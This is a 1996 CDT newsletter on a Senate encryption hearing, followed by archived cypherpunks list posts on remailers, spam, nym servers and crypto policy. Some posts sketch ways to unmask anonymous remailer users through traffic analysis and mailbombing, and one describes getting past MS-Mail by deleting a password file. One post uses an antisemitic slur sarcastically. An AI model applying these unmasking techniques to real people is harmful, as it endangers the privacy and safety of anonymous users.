   / ____|  __ \__   __|   ____        ___               ____             __
  | |    | |  | | | |     / __ \____  / (_)______  __   / __ \____  _____/ /_
  | |    | |  | | | |    / /_/ / __ \/ / / ___/ / / /  / /_/ / __ \/ ___/ __/
  | |____| |__| | | |   / ____/ /_/ / / / /__/ /_/ /  / ____/ /_/ (__  ) /_
   \_____|_____/  |_|  /_/    \____/_/_/\___/\__, /  /_/    \____/____/\__/
   The Center for Democracy and Technology  /____/     Volume 2, Number 26
----------------------------------------------------------------------------
      A briefing on public policy issues affecting civil liberties online
----------------------------------------------------------------------------
 CDT POLICY POST Volume 2, Number 26                        June 28, 1996

 CONTENTS: (1) Senate Encryption Hearing - Sea Change in Policy Debate
           (2) First Ever "Cybercast" of Congressional Hearing
           (3) SAFE Forum Live Online -- Join Us July 1st!
           (4) CDT Deputy Director Janlori Goldman on C-SPAN - 7/1/96
           (5) How to Subscribe/Unsubscribe
           (6) About CDT, contacting us

  ** This document may be redistributed freely with this banner intact **
        Excerpts may be re-posted with permission of <editor@cdt.org>
         ** This document looks best when viewed in COURIER font **
-----------------------------------------------------------------------------

(1) SENATE ENCRYPTION HEARING ILLUSTRATES SEA CHANGE IN POLICY DEBATE

On Wednesday June 26, 1996 the Senate Commerce Subcommittee on Science,
Space, and Technology held a hearing to consider legislation designed to
encourage the widespread availability of strong, easy-to-use, privacy and
security technologies for the Internet.  Wednesday's hearing illustrated
that a sea change has occurred in Congressional attitude towards the
encryption policy debate.

While members of the Subcommittee noted the complex law enforcement issues
raised by the encryption policy debate, the Senators also recognized that
because of the global nature of the Internet, top down regulations such as
export controls and centralized government mandates like the Clipper
schemes will not address the needs of individuals, business, and even law
enforcement in the Information Age.

In addition, several Senators noted that future of electronic commerce,
privacy, and the competitiveness of the US computer industry should not be
held hostage to law enforcement considerations.

This change in Congressional attitude towards encryption policy is
significant and extremely encouraging.

Wednesday's hearing was also significant because it was the first ever
Congressional hearing cybercast live on the Internet. Details on the
Cybercast are attached below.

The hearing, chaired by Senator Conrad Burns (R-MT), was called to consider
the Promotion Of Commerce Online in the Digital Era (Pro-CODE) legislation,
which would relax current regulations restricting the export of strong
encryption.

Witnesses testifying before the panel included:

* Phil Zimmermann, Inventor of PGP
* Whit Diffie, Sun Microsystems, Father of Public-Key Cryptography
* Phil Karn, Qualcomm Inc, Cryptographer
* Marc Rotenberg, Director, Electronic Privacy Information Center
* Jerry Berman, Executive Director, Center for Democracy and Technology
* Matt Blaze, Lucent Technologies Cryptographer,
* Barbara Simons, Chair of US Public Policy Committee, ACM
* And 135 Netizens (http://www.crypto.com)

CDT Executive Director Jerry Berman also testified before the Subcommittee.
Noting that the current US encryption policy has left individual Internet
users without adequate privacy and businesses without necessary security,
Berman urged Congress to instead move forward to reform US policy based on
the following principals:

* THE INTERNET IS NOT LIKE A TELEPHONE SYSTEM: The traditional approach
  to wiretapping cannot simply be extended to the Internet. This new
  medium encompasses a range of social functions far beyond simple two-
  way voice communication.  These broad activities demand a heightened
  capacity for uses to protect their security and privacy online.

* THE INTERNET IS A GLOBAL, DECENTRALIZED MEDIUM: Efforts to impose
  unilateral national policies -- such as export controls or key escrow
  proposals -- are unlikely to be accepted widely.  Decentralized user
  choice solutions to privacy problems are preferable to and more
  effective than centralized, governmental mandates (such as the
  Clipper proposals).

* ON THE INTERNET, THE BILL OF RIGHTS IS A LOCAL ORDINANCE:
  Constitutional guarantees of privacy and free expression to U.S.
  Citizens whose communications regularly cross national borders.
  Policies should be designed to protect Americans outside the shelter
  of U.S. law.

Berman expressed CDT's strong support for Congressional efforts to reform
US Encryption policy, and urged Congress to act quickly to liberalize
export controls and provide American Internet users with the strong
security and privacy they so badly need.

Audio transcripts of the Hearing, copies of the prepared statements of the
witnesses, and other background information is available at CDT's
encryption policy web page: http://www.cdt.org/crypto/

HEARING SHOWS NEW SENSE OF URGENCY AND FOCUS IN CONGRESS

The clearest example of the emerging frustration in Congress with the
current export restrictions came in an exchange between Senator John
Aschroft (R-MO) and Phil Karn, a cryptographer with Qualcomm and a
plaintiff in a case challenging the export restrictions:

Sen. Aschroft: So for all other countries, the world is the market, but
               for American companies, America is the only market and
               the rest of the world is off limits?

Karn:          You've got it.

Sen. Aschroft: Mr. Chairman, I think that's one of the reasons we need
               to look very carefully at the bill (Pro-CODE) we are
               looking at here today...

Sen. Aschroft: In all our discussions about whether it (cryptography) is
               good or bad, we ignore the fact that it's THERE, and it
               can be available to Americans by American companies, it
               cannot be available to anyone else by American companies,
               but it can be available around the world by a company in
               any other country.

This exchange, as well as strong statements in support of the Burns
Pro-CODE bill from Senators Patrick Leahy (D-VT), Ron Wyden (D-OR), and
Representative Bob Goodlatte (R-VA), who made the unusual move of coming to
a Senate hearing, show that Congress is finally giving the need to reform
US encryption policy serious support.

A hearing of the full Senate Commerce Committee, chaired by Senator Larry
Pressler (R-SD) is expected in mid July.  Representatives from the
Administration and Law Enforcement agencies are expected to testify.  CDT
is working with Senator Burns' and Senator Pressler to bring that hearing
live online.  Check CDT's "Congress and the Net" Web Page at
http://www.cdt.org/net_congress/

-----------------------------------------------------------------------

(2) FIRST EVER CYBERCAST OF CONGRESSIONAL HEARING SHOWS CONGRESS'
    GROWING DESIRE TO REACH OUT TO THE INTERNET COMMUNITY

Wednesday's hearing was the first Congressional hearing to be cybercast
live on the Internet.  The cybercast, coordinated at the request of Senator
Burns by the Center for Democracy and Technology, HotWired, DIGEX, and the
Voters Telecommunications Watch, provided Netizens around the world with
the opportunity to be a part of the Congressional debate on an important
Internet policy issue.

By reaching out to the net.community and providing netizens with an
opportunity to participate in the hearing (Senator Burns asked several
questions posed by the online audience), the cybercast marked an historic
moment in the evolution of the net.community as a political force.

In addition to a live audio feed from the hearing, approximately 40
netizens participated in a simultaneous discussion of the hearing in a chat
area on HotWired.  A member of Senator Burns' staff also joined the
discussion from inside the hearing room, providing insights into the
proceedings, answering questions from the audience, and delivering audience
questions to Senator Burns.

The goal of the hearing cybercast, as well as other recent CDT sponsored
online discussions with members of Congress, is to bring the net.community
and Congress together on critical Internet policy issues in order to
encourage a constructive dialogue and mutual understanding.
CDT is pleased to have been a part of this historic event, and looks
forward to bringing the next Senate Encryption hearing tentatively set for
mid-July online.

Audio transcripts from the hearing are available at:

     http://www.cdt.org/net_congress/

----------------------------------------------------------------------

(3) SECURITY AND FREEDOM THROUGH ENCRYPTION FORM -- JULY 1, STANFORD CA

The Security and Freedom through Encryption (SAFE) is set for July 1 in
Stanford, California.

The event will bring together members of Congress, privacy advocates,
cryptographers, and industry leaders for a discussion on the need to reform
US encryption policy.  A complete list of speakers and the program schedule
is available at the URL below.

HOW TO PARTICIPATE IN THE SAFE FORUM

* The Forum is free and open to the public. You can reserve your free
  ticket by visiting

    http://www.crypto.com/safe

  SPACE IS LIMITED AND YOU MUST REGISTER BY 12:00 MIDNIGHT EDT/9:00 pm
  PDT SUNDAY June 30.

* The SAFE Forum will also be CYBERCAST LIVE ON THE NET! For information
  on how you can join, visit:

    http://www.crypto.com/safe/cybercast.html

-----------------------------------------------------------------------

(4) CDT DEPUTY DIRECTOR TO APPEAR ON C-SPAN'S WASHINGTON JOURNAL
    MONDAY JULY 1
    7:45am EDT / 4:45am PDT

CDT Deputy Director Janlori Goldman will appear on C-SPAN's interview
program "Washington Journal" on Monday July 1 at 7:45am EDT / 4:45am PDT.
She will be discussing privacy issues on the Internet.  The program will
also highlight CDT's Privacy Demonstration and Online Privacy
Clearinghouse.

CDT's Privacy Demonstration and Privacy Issues Page can be accessed at:

     http://www.cdt.org/privacy/

------------------------------------------------------------------------

(5) SUBSCRIPTION INFORMATION

Be sure you are up to date on the latest public policy issues affecting
civil liberties online and how they will affect you! Subscribe to the CDT
Policy Post news distribution list.  CDT Policy Posts, the regular news
publication of the Center For Democracy and Technology, are received by
nearly 10,000 Internet users, industry leaders, policy makers and
activists, and have become the leading source for information about
critical free speech and privacy issues affecting the Internet and other
interactive communications media.

To subscribe to CDT's Policy Post list, send mail to

     policy-posts-request@cdt.org

with a subject:

     subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the
above address with a subject of:

     unsubscribe policy-posts

-----------------------------------------------------------------------

(6) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance democratic values and
constitutional civil liberties in new computer and communications
technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org/
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1634 Eye Street NW * Suite 1100 * Washington, DC 20006
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post 2.26                                            6/28/96
-----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 29 Jun 1996 13:40:44 +0800
To: cypherpunks@toad.com
Subject: Abridged spam sucker list (was Re: `` Cyber - Times ``)
In-Reply-To: <199606272057.NAA27234@dfw-ix11.ix.netcom.com>
Message-ID: <Pine.GUL.3.94.960628195321.24211B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 27 Jun 1996, `` Cyber - Times `` wrote:

>                    http://members.gnn.com/HUDTRACER/fha.htm
> or E-Mail our auto-responder at:====>   hud@cyber-times.com    
> personality call Mrs. Roberts at InterNetWorks at: (619) 781-4104. 
> Call NOW  ...24 hours a day! Working at home is the "Wave of the Future". 
> or e-mail my autoresponder at: internetworks@cyber-times.com
> http://www.catalog.com/impulse/tel.htm or Email:  ad18@cyber-times.com
> good only while supplies last. Call us toll-free at (800) 529-2919 to get all
> Voice box 800-566-5319/800-663-0631 ref. #32025-9
> to A. Tucker   Box 371264    El Paso, Texas  79937.
> in compensation plan.  208-263-5681 9am-8pm PDT.
> 1-900-476-6368 EXT. 6761
> $2.99 per minute
> Must be 18 years to Call
> Serv-U (619) 645-8434
> For information email at: ad19@cyber-times.com or call Ms. Doughery
> for an interview at (409) 756-5669 9-6 p.m. Central Time.
> benefits available only to our downline.  Call NOW:  512-505-6838 (3-minute
> recorded message) Get fax on demand:  703-736-1600, doc 839 (call from
> fax-phone) E-mail: ad5@cyber-times.com      Fax: 360-423-2238         Do it Now!
> Write the Perfect Bullet" section, send $14.95 to: M. Rogers, P.O. Box 583,
> Hayward CA  94543-0583
> publishing at 307-856-7090 or E-mail your daytime phone number to: 
> ad20@cyber-times.com 
> 1-800-995-0796 ext. 2583
> ( 800 ) 955-3974 or e-mail:  ad10@cyber-times.com
> E-mail for details and more information:  ad13@cyber-times.com
> 1-900-369-0419
> ONLY $1.99/min  18+  Futurefone
> 19426 or 1-800-689-8707 all cards. Visit Website at:
> http://www.acy.digex.net/~questflm/
> 1-800-240-1263
> died in an area is on the discs. **   E-mail:  ad21@cyber-times.com Leave postal
> obligation, Simply E-mail:  ad22@cyber-times.com 
> Please call: Louie at 503-644-7714 or Fax to 503-671-9964
> Norma Jean at 503-644-3634
> should CALL Mr. Bellet 1-804-643-3229 24 hours a day or EMAIL
> gatesnet@cyber-times.com
> request a price list.   Ph: (215) 953-8239     Fax: (215)953-8249    Email:
> ad23@cyber-times.com 
> ** We also build TARGETED E-MAIL LISTS for your special needs call 
>    216-226-8799 For our SPECIAL PRICES!! So if you're selling something 
> flood@cyber-times.com Also, 2 MILLION E-mail addresses are included with your
> Creative Financial Alternatives
> CYBER-TIMES
> 14837 Detroit Ave. 
> Suite 135
> Lakewood, OH 44107
> * If you have any questions or want to place an ad call: 216-226-8799
>   and fax it to 216-226-3225. 
> Phone: 216-226-8799
> Fax: 216-226-3225





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich <rich@netbox.com>
Date: Sat, 29 Jun 1996 13:56:11 +0800
To: cypherpunks@toad.com
Subject: PC-ness of nym.alias.net
Message-ID: <199606290304.DAA15488@netbox.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 28 Jun 1996, Anonymous wrote:

> I would appreciate any information members may have regarding the
> security/safety of the new nym server nym.alias.net (in "alpha" state) who
> posted here about 3 weeks ago. Nym.alias.net reportedly is the same
> machine as anon.lcs.mit.edu. 
> 
> Specifically, is the individual running the nym _known_ to cypherpunks, or
> is this an unknown about whom I should have serious doubts.

I could tell you who it is, but then I'd have to kill you. So let's just
stick to publicly available information. 

According to the root DNS servers, which as we know are controlled by a ZOG
defense contractor, alias.net is an alias for alpha.jpunix.com, and
anon.lcs.mit.edu is indeed the same as nym.alias.net. alias2-dom is said to
get name service from Sameer and company, but that could be a trap. 

Obviously, they've infiltrated pretty deep, but thanks to you, we know to
be careful.

Then again, this could just be FUD from another Fucking Statist. Who
knows? 

Somewhat more seriously, wouldn't it be nice if the various remailers signed
each other's keys?

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMdScnJNcNyVVy0jxAQEwFQH/ZXv+9Nj5ZDjk5FpA33T+kw68H39p/SuW
Ab/hRfGGkZX97PIa50C7UVu4YROYE9RYcn7kalsZgFKOsJKAq3JKIw==
=1CQg
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Sat, 29 Jun 1996 12:09:15 +0800
To: cypherpunks@toad.com
Subject: anonymous mailing lists
Message-ID: <01I6GF62YWG291VYF3@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[ To: Cypherpunks ## 06/28/96 04:34 pm ##
  Subject: anonymous mailing lists ]

>Date: Fri, 14 Jun 1996 02:15:03 +0000 (GMT)
>From: Ecafe Mixmaster Remailer <mixmaster@remail.ecafe.org>
>Subject: Hackerpunks and C2

>The proposal for a Hackerpunks nym based mailing list is
>interesting, however, there are some concerns regarding the
>susceptibility of the list to traffic analysis.

I was thinking about attacks that can be carried out on remailers in
general, and came up with something that is potentially pretty
nasty, especially for anonymous mailing lists and people who post a
lot of stuff anonymously using ``nyms.''

Let's imagine an anonymous remailer network as a ``black box'' which
functions perfectly.  Messages (broken into equal-sized packets and
strongly encrypted) are sent into the network by the sender, and at
some later time, they come out at the receiver.  Let's assume there
is no possible way for an attacker to trace a message through this
network.  Now, we still have to deal with two more issues--mail goes
into the network, and comes out of the network.  At those two
points, there is trafic analysis available.  Specifically, we can
see how much data goes over the line.  (Naturally, if it's
encrypted, we can't tell how much of it is real data and how much is
padding.)

Generally, when we're attacking this system, we're trying to figure
out either the sender or the receiver of a message (or a sequence of
messages), based on what we can observe coming into and going out of
the network of remailers.  There are basically five scenarios:

1.   The sender wants to know who the receiver of his message is.
2.   The receiver wants to know who the sender of his message is.
3.   An outsider wants to identify the sender of a message.
4.   An outsider wants to identify the receiver of a message.
5.   One receiver of a message wants to know who the other receivers
     of the message are.  (This is the case for anonymous lists.)

Now, there are a couple of different ways these attacks can be
carried out.  Usually, I've seen people talk about ``tracing''
attacks, in which a message is traced from one side of the network
to another, without any clear idea of who might be on the other
side.  However, I think a more realistic situation is to imagine the
attacker trying to test the hypothesis that some person is on the
other end of the anonymous transmission.  If relatively few people
regularly send or receiver anonymous e-mail, then this is practical
for many kinds of test.  It's even more practical when we're dealing
with relatively small populations of interested people in some
technical subject.  (This is conceptually similar to the
``dictionary attack'' on passphrases.)  Basically, what we're
looking at, in that case, is some test which (with some reasonably
high probability) determines whether some person is the sender or
receiver of a given message or stream of messages.

This leads to some interesting insights.

1.   In reasonably large text messages, it's probably easy to test
hypotheses about senders.  There are metrics that can more-or-less
identify the writer of a piece of prose.  While it's no doubt
possible to defeat this kind of analysis for some things (i.e.,
blackmail notes or rigidly-defined messages in a cryptographic
protocol), I suspect that this is very hard to defeat for a mailing
list where the objective is to discuss serious technical issues.
(This kind of analysis also causes headaches for people trying to do
strong steganography in text.)

2.   If an attacker (i.e., the NSA) logs the total volume of all
traffic in and out of the remailer network, and to whom each message
came from or went to, then that attacker can probably mount some
very powerful hypothesis-testing attacks.

It's these attacks I want to discuss.

If Alice sends a message to Bob through the remailer network, two
things must happen to prevent it from being trivially traceable.

1.   The message has to change size.  If the message is already
encrypted, then compression isn't much of an option--so what's left
is padding it out by a random amount.  The amount of padding per
message is probably a uniformly distributed random variable.

2.   The message has to be delayed somewhat.  The delay is probably
also a uniformly distributed random variable, or possibly the result
of adding N such variables, where N is the number of chained
remailers.

For a single mailing, this is probably not much of a threat. There
will be enough ``noise'' in the delay and padding that most
transmissions will be masked.  However, consider the situation of a
mailing-list.  Alice and Bob are both recipients of the list. Alice
wants to decide whether Bob is receiving the list.  Let D be a delay
such that, if Alice received her copy at time T, 90% of the other
list members received their copy between T-D and T+D.  Now, Alice
looks at Bob's anonymous e-mail volume during that time span vs. at
all other times.  If he's receiving the same stuff she is, then
there should be an increase within that span of time, on average.

The random distribution of the arrival time will mask individual
transmissions, but with many messages, it probably will not.  (This
is conceptually similar to the situation in Paul Kocher's timing
attacks--adding some random pauses doesn't hurt the attack as much
as most people expect it to, because those random pauses, summed up
over many messages, become a normally distributed random variable.)

The average amount of anonymous e-mail Bob gets per day doesn't have
much effect, nor do occasional worst-cases. The only ways I can see
to prevent this attack are either to ensure that Bob gets a constant
rate of information from the anonymous remailer network, or to make
the arrival time span so large that other randomness in the sample
makes the change in volume undetectable.  In general, I don't think
this second one will work without accepting incredible delays on
messages.

This can also be adapted to tracing back anonymous posters to
newsgroups and mailing lists, when they use a consistent nym.
(They could also be traced by textual analysis.)  In this case, the
attacker starts by posting some anonymous messages (not using a
nym--he doesn't need one), to get some statistics on what the
average delay is, and also what the average amount of padding is. He
may do this for several different ways of putting things
together--he's got almost unlimited time to gather acceptable data.

At this point, he observes in/out traffic logs for each hypothesized
sender during a wide timespan before the arrival of the post at its
destination.  He compares activity inside that span with activity
outside, over a large number of posts.  If there is a correlation,
then he's got the e-mail address of the nym.

There are ways to get around this second attack, at least to some
extent.  However, I don't think it's wise to count on even very good
remailer networks (i.e., the Mixmaster stuff) to protect your
anonymity in this situation.  (However, note that I'm thinking in
terms of a very well funded, determined adversary.  It's probably
not too bad to count on it to protect your anonymity from
technically unsophisticated attackers--but I wouldn't recommend
using it for things that (say) the FBI or NSA might get very
interested in.)

I think the best defense against this will be something like this:
Each user sets a quota of how much trafic he will take in and send
out per day.  Once per day, he goes through an interaction in which
he downloads and uploads that much stuff, whether there's any of it
for him or not.  (Naturally, this won't be detectable from looking
at the transmission, timing the interaction, etc.)  This makes any
volume variations per day disappear.  Unfortunately, it also limits
the user's total inflow and outflow, which means he'll have to set
it to something larger than the maximum he ever expects to get.  (It
would be possible to have occasional overflow onto the next day's
downloads, but not too often, or the user would fall further behind,
on average, each day.)  The size of these quotas will still leak
some information, though not enough for the kinds of attacks I
discussed above.

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey@delphi.com / kelsey@counterpane.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMdRWR0Hx57Ag8goBAQHCowQA71WBKkx1yonS0dEpy3pe7lgvSJPkpLUk
zLjm0KeFoP+HGQBep48iILRYBlbGy5czcxNCU4zhE6+c4PWwvD+BpaGGccWWkyRi
0l/rdo5L5/1KgnpCAQJ/HNyRH0fO2NNOHvGB3m7I0H3lfmfOlNed8oIIjPFDVB23
60wpMZ9S93w=
=HC1g
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joseph Sokol-Margolis <joseph@genome.wi.mit.edu>
Date: Sat, 29 Jun 1996 13:03:50 +0800
To: cypherpunks@toad.com
Subject: Re:secure WWW on UNsecure servers
In-Reply-To: <199606280438.VAA05479@infinity.c2.org>
Message-ID: <v03007405adfa3dc7588f@[18.157.1.107]>
MIME-Version: 1.0
Content-Type: text/plain


> How might one arrange for these encrypted web pages residing on an
> (unsecure) server to get decrypted only at the client's machine?
> This should work as transparently as possible for the user;
> except possibly for a userid/password query it should look like a
> normal web browsing session.  For now, we can assume that the
> decrypted web pages contain only HTML and images in .gif format.

It seems like it could be done by writing a plug-in that passed the
encrypted page to pgp (or had it internally) and used that to decrypt it.
The plug-in could store  the pass-phrase locally and clear when the user
disconnected.

It *might* also be possible to do this with java. I don't know enough java
to say for sure, but couldn't you build an interface that took the
encrypted data passed it though whatever and then displayed it on the local
screen. The applet could produce a viewer with a 'sigoff' button telling
the applet to forget the pass-phrase. Comments?


Joseph Sokol-Margolis
joseph@genome.wi.mit.edu
Systems Administrator






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 29 Jun 1996 09:59:16 +0800
To: cypherpunks@toad.com
Subject: DUO_pol
Message-ID: <199606282215.WAA21486@pipe6.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   We offer cypherpunk Jim Ray's column in The Miami Herald of 
   June 24 on suppression of political freedom in Florida by 
   the Democrat-Republican duopoly. 
 
 
   http://pwp.usa.pipeline.com/~jya/duopol.txt  (5 kb) 
 
   DUO_pol 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 29 Jun 1996 16:04:16 +0800
To: "Declan B. McCullagh" <cypherpunks@toad.com
Subject: Re: News: NEC has encrypted networks ...
Message-ID: <199606290531.WAA15509@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:52 PM 6/28/96 -0400, Declan B. McCullagh wrote:
>Excerpts from internet.cypherpunks: 28-Jun-96 News: NEC has encrypted
>net.. by Ernest Hua@XENON.chromat 
>> Japanese companies catching up and passing American companies
>> should scare those Congressional critters into action:
>
>Realistically, there's not a chance in hell Pro-CODE will pass this
>session.
>-Declan

Which reminds me...

About that NTT chip:  While I haven't been looking particularly carefully 
for it, I haven't noticed an announcement in any of the electronics 
magazines I normally read.  Has anyone seen a reference to it?

I think we ought to learn more about it:  Does it implement an open 
standard, so that other manufacturers can build compatible phones?


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Wall Street Journal Interactive Edition             <wsj-announce@interactive.wsj.com>
Date: Sun, 30 Jun 1996 08:09:15 +0800
To: Multiple recipients of list WSJ-ANNOUNCE3             <WSJ-ANNOUNCE3@LISTSERV.DOWJONES.COM>
Subject: Important News from The Wall Street Journal Interactive Edition
Message-ID: <v02130503adfa48d0a6e4@[143.131.186.21]>
MIME-Version: 1.0
Content-Type: text/plain


Dear Wall Street Journal reader:

If you haven't visited the Money & Investing Update in a while, we wanted to
let you know we've made some dramatic changes.  On April 29, we became The
Wall Street Journal Interactive Edition (http://wsj.com).

That means we've expanded, to bring you the entire spectrum of business
coverage provided by The Wall Street Journal. You'll see not only our
pioneering, continually updated coverage of the markets, but all the most
important stories in technology, marketing, the law--even sports and weather.

We've also added new features we hope make the Interactive Edition even more
useful, such as Personal Journal, which enables you to create your own
personalized view of today's news, and the ability to build and monitor your
own personal stock portfolio.

As a trial subscriber to Money & Investing Update, we are eager to have you
try the Interactive Edition.  So, your User Name and Password for the Update
are valid for the Interactive Edition as well.  Plus, as a special thank you
for your early support, your access to the Interactive Edition WILL CONTINUE
TO BE FREE THROUGH AUGUST 31, 1996, after which time a very modest
subscription fee will be required to continue.

But remember, NO CREDIT CARD OR OTHER PAYMENT INFORMATION is required until
after August 31, and ONLY THEN if you decide you want to join us as a paid
subscriber.  Until then, read the Interactive Edition as often as you like
at no charge.

To see the Interactive Edition, you can jump directly to the front page at
http://wsj.com/edition/current/summaries/front.htm, or take a brief tour of
the most interesting new features at http://wsj.com/tour.htm.

We look forward to hearing your reactions to our interactive efforts, since
the comments of readers like you have already played a powerful role in
shaping our future.  Please write us at the address below with any questions
or comments.

Neil Budde
Editor
The Wall Street Journal Interactive Edition
info@interactive.wsj.com

P.S.  If you experienced difficulty accessing the Interactive Edition during
our first few weeks, we apologize.  Reader interest completely exceeded our
expectations.  However, we've made a number of major system improvements
since then and we encourage you to come back and try again.

--------------------------------------------

If you don't want to receive future mail from the WSJ-ANNOUNCE list, simply
reply to this message with UNSUBSCRIBE WSJ-ANNOUNCE3 in the message body.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 29 Jun 1996 17:42:19 +0800
To: cypherpunks@toad.com
Subject: Re: rsync and md4
Message-ID: <199606290549.WAA16170@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:50 PM 6/29/96 +1000, Andrew Tridgell wrote:
>Why md4? I chose md4 because it seemed to be the fastest of the
>reputedly strong, publicly available checksum algorithms.

Whatever you do, PLEASE stop using the term "checksum" when what you really 
mean is CRC, hash or something else.  A "checksum" is a bad error checker, 
only somewhat better than none at all.  If you use the term "checksum" some 
neophyte might actually misinterpret what you're doing and implement a real, 
honest-to-goodness checksum in his next program.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 29 Jun 1996 13:57:52 +0800
To: hua@XENON.chromatic.com>
Subject: Re: News: NEC has encrypted networks ...
In-Reply-To: <199606281930.MAA00143@ohio.chromatic.com>
Message-ID: <Elp9dtW00YUyFVfplB@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 28-Jun-96 News: NEC has encrypted
net.. by Ernest Hua@XENON.chromat 
> Japanese companies catching up and passing American companies
> should scare those Congressional critters into action:

Realistically, there's not a chance in hell Pro-CODE will pass this
session. (Research question for cypherpunks: how many days left are
there in the legislative calendar?)

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gregmi@galileo.mis.net (Greg Miller)
Date: Sat, 29 Jun 1996 10:08:23 +0800
To: Leo WONG Wing-yan <wywong2@cs.cuhk.hk>
Subject: Re: MS-Mail Security
In-Reply-To: <Pine.SOL.3.91.960627231233.11957A-100000@sol25.cs.cuhk.hk>
Message-ID: <31d46260.87906896@pop.mis.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 27 Jun 1996 23:13:23 +0800 (HKT), you wrote:

>    I would like to gather informations of whether the MS-Mail server is 
>secure or not, is anyone heard of somebody, say, disguise as other user 
>or read other user e-mail?

	I haven't looked into it a great deal, but I have forgotten my password
and was able to retreive my mail by deleting the password file and making a new
one.


begin 644 tagline.txt
enum MicrosoftBoolean {TRUE, FALSE, MAYBE};
Greg Miller: Programmer/Analyst (gregmi@mis.net)
http://grendel.ius.indiana.edu/~gmiller/
end.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 29 Jun 1996 13:44:16 +0800
To: perry@piermont.com
Subject: Re: crypto and bagpipes [NOISE]
In-Reply-To: <199606280352.XAA06868@jekyll.piermont.com>
Message-ID: <Alp9gs600YUyRVfsNl@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 27-Jun-96 Re: crypto and bagpipes
[NO.. by "Perry E. Metzger"@pierm 
> No one who has heard sustained bagpipe playing can deny the fact that
> bagpipes are indeed an instrument of war, with no legitimate place in
> peaceful everyday society.

Hmm... Carnegie Mellon University is the only school in the country with
a bagpipe major, you know. You haven't lived until you've heard a
screeching 'pipe at 3 am in front of Hunt Library.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 29 Jun 1996 15:02:07 +0800
To: JMKELSEY@delphi.com
Subject: Re: anonymous mailing lists
In-Reply-To: <01I6GF62YWG291VYF3@delphi.com>
Message-ID: <199606290404.XAA32220@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


How about this attack: suppose I want to find out who hides behind
an alias MightyPig@alpha.c2.org and I have the ability to monitor
all internet traffic. Then I simply start mailbombing that address
and see whose account gets unusually high traffic volume.

A nice, albeit quite expensive, way of pretection from traffic analysis
is to create a mailing list (or a newsgroup) and forward all messages to
all users of that mailing list or newsgroup. Of course, since messages
are encrypted, only the recipients will be able to decrypt them.

This way the list of suspects is all subscribers of that list or
newsgroup and there is no way to discriminate them.

Instead of having messages to be sent to all recipients all the time,
alpha.c2.org may be programmed so that it sends out every message not to
only one recipient X, but to X and 20 other randomly selected people.

It apparently makes traffic analysis much harder.

Then users of alpha.c2.org will have to install mail filters that
automatically delete all incoming mail not intended to be read by them
(they can't read such messages anyway).

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 29 Jun 1996 16:43:07 +0800
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: John Grubor and you
In-Reply-To: <199606290307.FAA23142@basement.replay.com>
Message-ID: <Pine.GUL.3.94.960628230701.24211G-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 29 Jun 1996, Anonymous wrote:

> Lucifer Remailer Operator wrote:
> 
> >Just for the record, I am NOT John Grubor and had never even heard of him
> >before I did an Altavista search on his name earlier today.  The concept that
> >some net.loon like Grubor would get another account with DHP to run an
> >anonymous remailer for whatever reason is LAUGHABLE.  From what I have read,
> >Grubor spams newsgroups quite often, something I have not done nor plan on
> >doing.  I was expecting people to be posting paranoid rantings about how I
> >am obviously a SPOOK...
> 
